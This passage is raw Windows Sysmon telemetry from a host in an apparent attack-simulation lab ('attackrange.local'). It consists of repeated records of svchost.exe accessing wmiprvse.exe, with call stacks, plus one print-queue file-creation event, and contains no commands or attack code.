ll+51791 10341000x80000000000000001052Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.972{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001051Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.972{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001050Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.972{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001049Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.957{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001048Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.957{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001047Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.957{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001046Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.957{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001045Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.957{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001044Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.957{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001043Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001042Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001041Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001040Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001039Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001038Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001037Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001036Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001035Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001034Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.910{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001033Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.910{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001032Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.910{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001031Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.910{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001030Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.910{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001029Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.910{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001028Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:05.628{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exeC:\Windows\System32\DriverStore\FileRepository\printqueue.inf_amd64_293dcb0d10d72f40\printqueue.PNF2016-09-12 11:34:54.640 10341000x80000000000000001027Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 